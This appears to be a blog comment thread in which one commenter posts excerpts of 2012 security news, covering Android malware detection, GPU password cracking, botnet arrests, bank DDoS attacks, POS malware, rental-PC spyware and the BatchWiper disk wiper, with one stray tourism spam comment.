“Besides this there should be good contact with the ISP beforehand, let them know that there will be abuse (filesharing and the DMCA, mainly) and what Tor is. Or if more money is available to invest, a membership of ARIN/RIPE is well worth it, getting own IP blocks and an AS number (running their own network) helps to resolve issues faster and means you get direct information if servers should be tapped or confiscated (unlike if rented, then only your ISP gets the warning).”
“I could not make them understand why I would ‘waste’ resources and bandwidth (translating into money) to run a Tor node,”
“It’s not unusual for the maintainer of a [Tor] exit node to be the focus of abuse complaints: mostly DCMA notices, I think. Reports of paedophilia-related abuse are a lot rarer, but not unheard of,” he added.
Tomi Engdahl says:
Boffin: Android’s on-board malware scanner utterly FAILS
App blocker detects just 15% of malware
http://www.theregister.co.uk/2012/12/10/android_malware_scanner_fails/
Google has added new anti-malware capabilities to Android 4.2 “Jelly Bean,” but relying on them to block malicious apps might not be a good idea, says a computer science boffin from North Carolina State University.
The latest Android – currently only found on a select group of handsets – includes an on-device “application verification service” that claims to be able to alert users of potentially harmful apps and block their installation, irrespective of where they came from.
Associate professor Xuxian Jiang wanted to know how well the new feature fared against known Android malware, and to that end he pitted it against a collection of samples obtained by the university’s Android Malware Genome Project.
The results? Not so good. Of the 1,260 samples tested, Android’s on-device malware checker only managed to spot 193 of them, for a paltry detection rate of just 15.3 per cent.
Why such a poor showing for Google’s product? According to Jiang, Jelly Bean’s app verification service relies on relatively few data points to decide whether or not to block a given app install.
“Specifically, our study indicates that the app verification service mainly uses an app’s SHA1 value and the package name to determine whether it is dangerous or potentially dangerous,” he writes. “This mechanism is fragile and can be easily bypassed. It is already known that attackers can change with ease the checksums of existing malware (e.g., by repackaging or mutating it).”
Tomi Engdahl says:
25-GPU cluster cracks every standard Windows password in <6 hours
All your passwords are belong to us.
http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/
A password-cracking expert has unveiled a computer cluster that can cycle through as many as 350 billion guesses per second. It's an almost unprecedented speed that can try every possible Windows passcode in the typical enterprise in less than six hours.
The five-server system uses a relatively new package of virtualization software that harnesses the power of 25 AMD Radeon graphics cards.
It achieves the 350 billion-guess-per-second speed when cracking password hashes generated by the NTLM cryptographic algorithm that Microsoft has included in every version of Windows since Server 2003. As a result, it can try an astounding 958 combinations in just 5.5 hours, enough to brute force every possible eight-character password containing upper- and lower-case letters, digits, and symbols. Such password policies are common in many enterprise settings. The same passwords protected by Microsoft's LM algorithm—which many organizations enable for compatibility with older Windows versions—will fall in just six minutes.
The Linux-based GPU cluster runs the Virtual OpenCL cluster platform, which allows the graphics cards to function as if they were running on a single desktop computer. ocl-Hashcat Plus, a freely available password-cracking suite optimized for GPU computing, runs on top, allowing the machine to tackle at least 44 other algorithms at near-unprecedented speeds. In addition to brute-force attacks, the cluster can bring that speed to cracks that use a variety of other techniques, including dictionary attacks containing millions of words.
"What this cluster means is, we can do all the things we normally would with Hashcat, just at a greatly accelerated rate," Jeremi Gosney, the founder and CEO of Stricture Consulting Group, wrote in an e-mail to Ars.
Using the new cluster, the same attack would move about four times faster. That's because the machine is able to make about 63 billion guesses against SHA1, the algorithm used to hash the LinkedIn passwords
The cluster can try 180 billion combinations per second against the widely used MD5 algorithm
The speeds apply to so-called offline cracks, in which password lists are retrieved by hackers who exploit vulnerabilities on website or network servers. The passwords are typically stored using one-way cryptographic hash functions, which generate a unique string of characters for each unique string of plaintext. In theory, hashes can't be mathematically reversed. The only way to crack them is to run guesses through the same cryptographic function. When the output of a particular guess matches a hash in a compromised list, the corresponding password has been cracked.
The advent of GPU computing over the past decade has contributed to huge boosts in offline password cracking.
"Before VCL people were trying lots of different things to varying degrees of success," Gosney said. "VCL put an end to all of this, because now we have a generic solution that works right out of the box, and handles all of that complexity for you automatically. It's also really easy to manage because all of your compute nodes only have to have VCL installed, nothing else. You only have your software installed on the cluster controller."
The precedent set by the new cluster means it's more important than ever for engineers to design password storage systems that use hash functions specifically suited to the job. Unlike, MD5, SHA1, SHA2, the recently announced SHA3, and a variety of other "fast" algorithms, functions such as Bcrypt, PBKDF2, and SHA512crypt are designed to expend considerably more time and computing resources to convert plaintext input into cryptographic hashes. As a result, the new cluster, even with its four-fold increase in speed, can make only 71,000 guesses against Bcrypt and 364,000 guesses against SHA512crypt.
Tomi Engdahl says:
25-GPU cluster cracks every standard Windows password in <6 hours
http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/
The five-server system uses a relatively new package of virtualization software that harnesses the power of 25 AMD Radeon graphics cards. It achieves the 350 billion-guess-per-second speed when cracking password hashes generated by the NTLM cryptographic algorithm that Microsoft has included in every version of Windows since Server 2003. As a result, it can try an astounding 958 combinations in just 5.5 hours, enough to brute force every possible eight-character password containing upper- and lower-case letters, digits, and symbols. Such password policies are common in many enterprise settings. The same passwords protected by Microsoft's LM algorithm—which many organizations enable for compatibility with older Windows versions—will fall in just six minutes.
The precedent set by the new cluster means it's more important than ever for engineers to design password storage systems that use hash functions specifically suited to the job. Unlike, MD5, SHA1, SHA2, the recently announced SHA3, and a variety of other "fast" algorithms, functions such as Bcrypt, PBKDF2, and SHA512crypt are designed to expend considerably more time and computing resources to convert plaintext input into cryptographic hashes. As a result, the new cluster, even with its four-fold increase in speed, can make only 71,000 guesses against Bcrypt and 364,000 guesses against SHA512crypt.
Tomi Engdahl says:
Hacker Group Touts 1.6 Million Password Dump To Protest UN Internet Regulation
http://www.forbes.com/sites/andygreenberg/2012/12/10/hacker-group-touts-1-6-million-password-dump-to-protest-un-internet-regulation/
The controversy around a United Nations body’s efforts to regulate the Internet have already been opposed in a U.S. Congressional resolution, a million-signature petition from Google, and by one of the Internet’s most famous creators. Now a group of hackers has registered their protest in the form they know best: Stealing and dumping millions of seemingly random usernames and passwords onto the Web.
The data dump, according to its accompanying statement, is aimed at “promoting hacktivism worldwide and drawing attention to the freedom of information on the net. For those two factors we have prepared a juicy release of 1.6 million accounts/records from fields such as aerospace, nanotechnology, banking, law, education, government, military, all kinds of wacky companies & corporations working for the department of defense, airlines and more.”
The statement offers Ghost Shell’s support to protests initiated by the hacker movement Anonymous against the ITU’s Internet regulation, encouraging websites to “deface themselves” with anti-ITU messages.
Anonymous published a lengthy statement of its own Monday, speaking out against the ITU’s regulations and specifically the “deep-packet inspection” standard it created last week for control and censorship of Internet traffic. “Don’t mess with the net. We like what we have. Our internet is working perfectly as an free and open model,” the statement reads. “It is your old systems that don’t work correctly. We cannot allow idiots to destroy our internet.”
Tomi Engdahl says:
Nokia engineer shows how to pirate games from the Windows 8 store
http://www.theverge.com/2012/12/11/3754006/windows-8-games-hack-piracy-in-app-purchases-justin-angel
Justin Angel, a Nokia engineer working on Windows Phone, has detailed how to compromise Windows 8 games revenue through in-app purchases. Angel highlights the Soulcraft Windows 8 game as an example of how Windows 8 users could potentially edit parts of a game to bypass having to pay for in-app purchases.
The process is a little complex for the average Windows 8 user, but the steps show the easy potential for piracy with Microsoft’s Windows Store approach.
Windows games have been affected by keygens and patches for years, but Angel says “storing encrypted data locally, alongside with the algorithm and the algorithm key/hash is a recipe for security incidents.”
Tomi Engdahl says:
FBI, International Law Enforcement Disrupt International Organized Cyber Crime Ring Related to Butterfly Botnet
http://www.fbi.gov/news/pressrel/press-releases/fbi-international-law-enforcement-disrupt-international-organized-cyber-crime-ring-related-to-butterfly-botnet
The Department of Justice and the FBI, along with international law enforcement partners, announced the arrests of 10 individuals from Bosnia and Herzegovina, Croatia, Macedonia, New Zealand, Peru, the United Kingdom, and the United States and the execution of numerous search warrants and interviews.
The operation identified international cyber crime rings that are linked to multiple variants of the Yahos malicious software, or malware, which is linked to more than 11 million compromised computer systems and over $850 million in losses via the Butterfly Botnet, which steals computer users’ credit card, bank account, and other personal identifiable information.
Facebook’s security team provided assistance to law enforcement throughout the investigation by helping to identify the root cause, the perpetrators, and those affected by the malware. Yahos targeted Facebook users from 2010 to October 2012, and security systems were able to detect affected accounts and provide tools to remove these threats.
Tomi Engdahl says:
E-mail e-signature still rare – too hard?
E-mail signature is not much used in Finland.
According to experts, as well as to consumers, businesses and government use to sign their mail rarely.
“No one can prevent your name from counterfeiting. It also must be taken with the seriousness,” says Communications Security Agency Head Erka Koivunen.
Electronic signature is used to verify that the sender is really the person who reads the email. An unsigned e-mail can be a big security risk, because anyone can send a message to someone else’s name.
Both consumers and service providers laziness effort: users are excited about the additional functions of e-mail in connection with, the producers did not turn invested in user-friendly technology.
“If there was an easy way to sign or encrypt e-mail, using it would be broader,” Koivunen believes.
“The problem is, how the Internet can be globally distribute keys (electronic signature authentication) management.”
Source: http://www.3t.fi/artikkeli/uutiset/teknologia/sahkopostin_sahkoinen_allekirjoitus_yha_harvinaista_liian_hankalaa
Tomi Engdahl says:
Internet Explorer Data Leakage
http://spider.io/blog/2012/12/internet-explorer-data-leakage/
On the 1st of October, 2012, we disclosed to Microsoft the following security vulnerability in Internet Explorer, versions 6–10, which allows your mouse cursor to be tracked anywhere on the screen—even if the Internet Explorer window is minimised. The vulnerability is particularly troubling because it compromises the security of virtual keyboards and virtual keypads.
Whilst the Microsoft Security Research Center has acknowledged the vulnerability in Internet Explorer, they have also stated that there are no immediate plans to patch this vulnerability in existing versions of the browser. It is important for users of Internet Explorer to be made aware of this vulnerability and its implications.
The vulnerability is already being exploited by at least two display ad analytics companies across billions of page impressions per month.
A demonstration of the security vulnerability may be seen
Tomi Engdahl says:
ReVuln – The TV is watching you
http://vimeo.com/55174958
In this video we demonstrate one of our 0-day vulnerabilities affecting Smart TV, in this case a Samsung TV LED 3D. Smart TV can be used to browse the internet, use social networks, purchase movies and do many other things. This demo shows how a vulnerability for such devices can be used to retrieve sensitive information, monitor and root the device itself remotely.
Tomi Engdahl says:
Islamic Hacker Group Resumes Attacks On Banks
http://yro.slashdot.org/story/12/12/13/2058234/islamic-hacker-group-resumes-attacks-on-banks
“PNC, Bank of America, SunTrust, and other major financial institutions have experienced a wave of DDoS attacks and site outages over the past couple of days, and Islamic extremist hacker group Izz ad-Din al-Qassam Cyber Fighters is claiming responsibility”
Tomi Engdahl says:
The 30-year-old prank that became the first computer virus
http://www.theregister.co.uk/2012/12/14/first_virus_elk_cloner_creator_interviewed/
To the author of Elk Cloner, the first computer virus to be released outside of the lab, it’s sad that, 30 years after the self-replicating code’s appearance, the industry has yet to come up with a secure operating system.
When Rich Skrenta, created Elk Cloner as a prank in February 1982, he was a 15-year-old high school student with a precocious ability in programming and an overwhelming interest in computers. The boot sector virus was written for Apple II systems, the dominant home computers of the time, and infected floppy discs.
Infected computers would display a short poem, also written by Skrenta, on every fiftieth boot from an infected disk
Elk Cloner, which played other, more subtle tricks every five boots, caused no real harm but managed to spread widely. Computer viruses had been created before, but Skrenta’s prank app was the first to spread in the wild, outside the computer system or network on which it was created.
This got him thinking: could he alter the contents of a floppy disc without touching it? His experiments led him to develop program that would run in the background, checking for the presence of a new disk and, if it found one, could modify files stored on the disk.
The result of this work was a program that, in effect, was coded to hop from disk to disk, propagating itself from machine to machine. The first virus, Elk Cloner, was born.
Elk Cloner took about two weeks to write in assembly language, Skrenta recalls. And if it’s mode of operation sounds simple, making it actually happen was quite a technical challenge.
“It worked like a charm and spread all over the place,”
Friends may have cursed Skrenta and then, seeing the joke, chuckled at his antics, but not everyone was impressed by the humour or the programming skill he demonstrated.
“The virus is fairly harmless, had no network connectivity, and problems were solved by a reboot,” he says.
Tomi Engdahl says:
Massive bank cyberattack planned
http://money.cnn.com/2012/12/13/technology/security/bank-cyberattack-blitzkrieg/
Security firm McAfee on Thursday released a report warning that a massive cyberattack on 30 U.S. banks has been planned, with the goal of stealing millions of dollars from consumers’ bank accounts.
RSA startled the security world with its announcement that a gang of cybercriminals had developed a sophisticated Trojan aimed at funneling money out of bank accounts from Chase (JPM, Fortune 500), Citibank (C, Fortune 500), Wells Fargo (WFC, Fortune 500), eBay (EBAY, Fortune 500) subsidiary PayPal and dozens of other large banks. Known as “Project Blitzkrieg,” the plan has been successfully tested on at least 300 guinea pig bank accounts in the United States, and the crime ring had plans to launch its attack in full force in the spring of 2013, according to McAfee, a unit of Intel.
Project Blitzkrieg began with a massive cybercriminal recruiting campaign, promising each recruit of a share of the stolen funds in exchange for their hacking ability and busywork.
The financial industry is accustomed to fending off skilled cyberthieves. It gets hit every day by thousands of attacks on its infrastructure and networks, according to Bill Wansley, a senior vice president at Booz Allen Hamilton who specializes in cybersecurity issues.
Those are just the attacks that get discovered. Not a single financial industry network that Booz Allen examined has been malware-free, he noted.
“If you catch something early on, you can minimize the threat,” Wansley said. “It’s definitely worthwhile to get a heads up.”
The Cyber Fighters are at it again, declaring that they will be launching attacks on banks’ websites this week as part of “Operation Ababil.” The banks are preparing.
“Security is core to our mission and safeguarding our customers’ information is at the foundation of all we do,” said Wells Fargo spokeswoman Sara Hawkins. “We constantly monitor the environment, assess potential threats, and take action as warranted.”
In June, McAfee uncovered “Operation High Roller” — a cyberattack that could have stolen as much as $80 million from more than 60 banks.
Tomi Engdahl says:
New exploit could give Android malware apps access to user data on Samsung GS III, other devices
http://thenextweb.com/mobile/2012/12/16/new-exploit-could-give-android-malware-apps-access-to-user-data-on-samsung-gs-iii-other-devices/
The brilliant minds at XDA Developers have done it again; this time, a user by the name of alephzain claims to have discovered a vulnerability in multiple Samsung devices that gives access to all physical memory. The potential is huge: attackers could use malicious apps to wipe data and brick devices or, more likely, quietly access user data.
While Samsung has yet to confirm the issue, it’s already being exploited. In fact, a senior moderator who calls himself Chainfire has created an APK file that uses Alephzain’s exploit, dubbed ExynosAbuse, to gain root privileges and install the latest release of SuperSU “on any Exynos4-based device.”
It’s worth noting that we are not aware of any Android malware apps that exploit this particular vulnerability. Furthermore, many devices are not affected since they don’t have the right processor;
Supercurio has released a quick fix for the vulnerability while we wait for Samsung to respond.
Tomi Engdahl says:
Dexter – Draining blood out of Point of Sales
http://blog.seculert.com/2012/12/dexter-draining-blood-out-of-point-of.html
The holiday season is here and with it comes a rise in credit card use. Cybercriminals know this and have been infecting consumer PCs with information stealing trojans for years. Recently however, Seculert identified a growing trend whereby cybercriminals are targeting Point of Sale (POS) systems. Instead of going through the trouble of infecting tens of thousands of consumer PCs or physically installing a skimmer, an attacker can achieve the same results by targeting just a few POS systems with specially crafted malware. Dexter is one example of such malware.
Dexter is custom-made malware that has been used over the past 2-3 months to infect hundreds POS systems. Some of the targeted POS systems include big-name retailers, hotels, restaurants and even private parking providers.
Tomi Engdahl says:
DDoS and Security Reports: The Arbor Networks Security Blog
http://ddos.arbornetworks.com/2012/12/lessons-learned-from-the-u-s-financial-services-ddos-attacks/
During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.
In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands
Lessons Learned
There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.
For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy but they were built for problems far different than today’s complex DDoS threat.
For providers of managed security services, they have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of provider’s cloud-based mitigation services.
What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success.
Tomi Engdahl says:
PNC and other banks have experienced an unusual volume of internet traffic. As a result, some customers may experience slowness or difficulty when logging into online and mobile banking.
Source: https://www.facebook.com/pncbank/posts/463260427064245
Tomi Engdahl says:
That square QR barcode on the poster? Check it’s not a sticker
Crooks slap on duff codes leading to evil sites
http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/
Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites.
By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links.
Security watchers have already seen spam messages pointing to URLs that use embedded QR codes. Now crooks have gone one step further by printing out labels and leaving them in well trafficked locations.
“we’ve seen criminals using bad QR codes in busy places putting them on stickers and putting them over genuine ones in airports and city centres.”
“If users want to make sure that their mobile is protected they should consider a QR reader that can check a website’s reputation before visiting it,”
Tomi Engdahl says:
At year 2012 Kaspersky Lab detected three significant malware programs that were used in cyber war operations: Flame, Gauss ja miniFlame.
The Flame: Questions and Answers
https://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers
Gauss: Nation-state cyber-surveillance meets banking Trojan
https://www.securelist.com/en/blog/208193767/
miniFlame aka SPE: “Elvis and his friends”
http://www.securelist.com/en/blog/763/miniFlame_aka_SPE_Elvis_and_his_friends
Foster Odea says:
UK attractions also come in natural form – there are a surprising number of areas of outstanding beauty for such a small island. England’s Lake District in Cumbria, the Cairngorms in Scotland and Snowdonia in Wales all provide inspiring environments that have sharpened the minds and pencils of poets and subsequently defined the psyche of the nations that make up the United Kingdom.
Tomi Engdahl says:
Watch out for this! New malware inflating Android users in phone bills
New Android devices detected malware sends text messages to the victim’s phone this fall. The victim is not likely to notice anything until the operator closes the connection high rise because of the phone bill.
The program encountered a security company Cloudmark says this is the first of their finds botnet that uses mobile phones to send spam messages.
The malware to spread from server in Hong Kong, which allows you to download two contaminated games (Angry Birds Star Wars and Need for Speed Most Wanted, both include that unpleasant malware surprise)
Hoaxes may egg on the recipient’s to download malware.
Fresh Botnet malware seems to be still in the test phase, but the message is spam volumes are rising. At the moment it seems to send SMS only to U.S. phone numbers.
As a precaution load the Android software only from trusted app stores, such as Google Play Store.
Source: http://m.tietoviikko.fi/Uutiset/Varo+t%C3%A4t%C3%A4!+Uusi+haittaohjelma+paisuttaa+Android-k%C3%A4ytt%C3%A4jien+puhelinlaskut+pilviin
Tomi Engdahl says:
How spyware on rental PCs captured users’ most intimate moments
PC Rental Agent was supposed to stem theft. Instead, it sparked a firestorm.
http://arstechnica.com/security/2012/12/how-spyware-on-rental-pcs-captured-users-most-intimate-moments/
“The Byrd’s were upset that their privacy had been intruded on and someone was likely looking at C. Byrd while she was undressed,” a Casper Police officer identified as L. Starnes wrote in the report. “The Byrd’s [sic] wanted to know why Aaron’s was using software to look at them when the computer was paid off.”
Brian and Crystal Byrd weren’t the only ones interested in the secret spy feature. In September, the US Federal Trade Commission secured an agreement that settled accusations that seven rent-to-own (RTO) stores and a software design firm surreptitiously captured end users’ most intimate moments. The charges of unfair and deceptive gathering of consumers’ personal information stemmed from the use of PC Rental Agent, a software package that is also the subject of a federal lawsuit accusing Pennsylvania-based DesignerWare, the rent-to-own stores, and their corporate parent of violating federal wiretap statutes.
According to court records, a training manual DesignerWare provided its customers contained an admonition that said: “Caution, using Level#3 (prompting of the webcam) may alert the user because most webcams have a light that will flash briefly when activated. Also, prompting for information may make them suspicious. Therefore, it is best to try the less intrusive methods first (Level# 1 & 2).”
No one claims to know how many PCs were monitored by PC Rental Agent.
That’s up to you. Some rental dealers like to make renters aware thinking it will deter them from forcing them to activate the agent, others don’t reveal it.”
The allegations contained in the complaint quickly got the attention of officials at the FTC and touched off a national debate about computer privacy.
During its earliest incarnations, the program provided little more than a kill switch to render a computer useless in the event that a customer held on to it without making payments as promised. But to Kelly’s chagrin, the software didn’t stem the rate of PC losses.
The resulting Detective Mode module was introduced in 2007 or 2008 and operated at a single level that took a screenshot and recorded keystrokes every two minutes.
Over time, Detective Mode acquired additional capabilities,
“It was a highly restricted program that was only built, installed, and activated by a company’s Loss Prevention Officer (LPO) to determine where and who was using the computer so it could be recovered,”
Tomi Engdahl says:
New Malware Wiping Data On Computers In Iran
http://it.slashdot.org/story/12/12/18/2134253/new-malware-wiping-data-on-computers-in-iran
“Iran’s computer emergency response team is reporting new malware targeting computers in the country that is wiping data from partitions D through I. It is set to launch on only particular dates.”
‘While there has been other data-wiping malware targeting Iran and other Middle East countries such as Wiper and Shamoon, researchers said there is no immediate connection.’
Tomi Engdahl says:
Baby got .BAT: Old-school malware terrifies Iran with del *.*
http://www.theregister.co.uk/2012/12/19/batchwiper/
A surprisingly simple disk-wiping malware has set off alarm bells in Iran after surfacing in the Middle East nation.
The software nasty deletes everything on storage drives attached to infected Windows PCs on specific dates, according to the Iranian security emergency response team. The malware was detected in one or more targeted attacks although the identity of the intended victim is not known.
Its operation is similar to the data-destroying worm Shamoon that ransacked Gulf oil giants earlier this year, but the two pieces of software otherwise appear unrelated.
BatchWiper, as the snared malware’s name suggests, uses a Windows batch file to remove files from infected machines, according to an analysis by security tools biz AlienVault.
A self-extracting RAR archive called GrooveMonitor.exe is used to drop the malware’s files onto a system.